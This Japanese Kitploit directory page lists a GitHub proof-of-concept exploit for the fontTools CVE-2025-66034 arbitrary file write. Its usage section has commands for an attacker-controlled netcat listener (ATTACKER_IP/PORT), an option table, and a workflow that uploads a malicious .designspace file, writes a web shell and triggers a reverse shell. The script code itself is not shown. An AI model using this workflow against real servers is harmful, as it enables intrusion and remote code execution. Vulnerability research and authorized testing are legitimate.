Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
varlib-cve-2025-66034 — CVE-2025-66034のfontTools可変フォント生成パイプラインにおける概念実証エクスプロイト。精巧に作成された.designspaceファイルにより出力パスを制御可能とし、任意のファイル書き込みを可能にします。このスクリプトは、ペイロード作成、フォント生成、アップロードを自動化し、問題を示します。 | Kitploit
ツール/GitHubGitHub/symphony2colour/varlib-cve-2025-66034
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubsymphony2colour/varlib-cve-2025-66034

varlib-cve-2025-66034

CVE-2025-66034のfontTools可変フォント生成パイプラインにおける概念実証エクスプロイト。精巧に作成された.designspaceファイルにより出力パスを制御可能とし、任意のファイル書き込みを可能にします。このスクリプトは、ペイロード作成、フォント生成、アップロードを自動化し、問題を示します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
29日前未レビュー

fontTools varLib CVE-2025-66034 エクスプロイト

cve component vulnerability vector impact language dependency license

このリポジトリは新しい脆弱性を導入するものではありません。

これは、fontTools varLib 可変フォント生成パイプラインに影響を与える CVE-2025-66034 に対する Proof-of-concept エクスプロイトです。

この脆弱性により、攻撃者は細工された .designspace ファイル内の出力ファイル名を制御できます。影響を受けるフォント生成サービスで処理されると、サーバーのファイルシステム上で任意のファイル書き込みが発生する可能性があります。

スクリプト varlib_cve_2025_66034.py は、ペイロードの作成、フォント生成、アップロード、およびオプションのシェル起動を自動化します。


特徴

  • fontTools を使用した互換性のあるマスターフォントの自動作成
  • ランダム化されたシェルファイル名の生成
  • カスタマイズ可能なターゲットパスとアップロードエンドポイント
  • 自動 nc リスナー
  • 手動によるフォント準備は不要

要件

Python 3.9+

依存関係のインストール:

root@kitploit:~
pip install fonttools requests

リスナーには Netcat が必要です。そのため、--no-listen オプションを使用する場合は、次のコマンドが必要です:

root@kitploit:~
nc -lvnp <PORT_NUMBER>

使用方法

ターゲットが mysite.com で実行されているセルフホスト型ラボであり、アップロードパス、ファイルシステム書き込みパス、および Web からアクセス可能なトリガーパスがスクリプトのデフォルトと一致する場合は、直接実行できます。

基本的な使用方法:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>

ターゲットが異なる URL やファイルシステムパスを使用している可能性が高いため、以下の利用可能なオプション(--url、--path、--trigger など)でデフォルトを上書きするか、スクリプトを手動で変更してください。

注: multipart アップロードフォームのフィールド名は環境によって異なる場合があります。ターゲットがスクリプトと同じフォームフィールド名を使用していない場合は、エクスプロイトを実行する前に files セクションで調整してください。

オプション

カスタムオプションを使用した例:

root@kitploit:~
python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com

エクスプロイトのワークフロー

  1. 互換性のあるマスターフォントを生成
  2. 悪意のある .designspace ファイルを作成
  3. multipart POST でペイロードをアップロード
  4. サーバー上に任意のファイルを書き込み
  5. HTTP リクエストでペイロードを起動

クレジット / 謝辞

以下に特別な感謝と敬意を表します:

  • オープンソースの fontTools ライブラリの開発に尽力された fontTools プロジェクトのメンテナーとコントリビューターの皆様。
  • CVE-2025-66034 を発見し、責任を持って開示したセキュリティ研究者の皆様。
  • ソフトウェアセキュリティの向上に役立つ脆弱性の文書化と分析に取り組むオープンソースセキュリティコミュニティの皆様。

この Proof-of-concept は、脆弱性とその影響を理解するための教育および研究目的で提供されています。


免責事項

このコードは教育および研究目的のみで提供されています。

所有していないシステム、または明示的なテスト許可を得ていないシステムに対してこのエクスプロイトを使用しないでください。

著者は、このソフトウェアの誤用またはそれによって引き起こされた損害について責任を負いません。


参考情報

  • CVE 詳細: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
  • GitHub Advisory: https://github.com/advisories/GHSA-768j-98cg-p3fv
  • fontTools プロジェクト: https://github.com/fonttools/fonttools
  • fontTools ドキュメント: https://fonttools.readthedocs.io/
ツールをダウンロード
引数説明
--ip攻撃者リスナーの IP アドレス
--portリスナーポート
--pathファイルが書き込まれるターゲットのファイルシステムパス(Web シェルを起動するには Web からアクセス可能である必要があります)
--urlアップロードエンドポイント(フォームは異なる場合があります)
--triggerアップロード後に書き込まれたペイロードを起動するために使用されるベース URL
--no-listen自動 netcat リスナーを無効化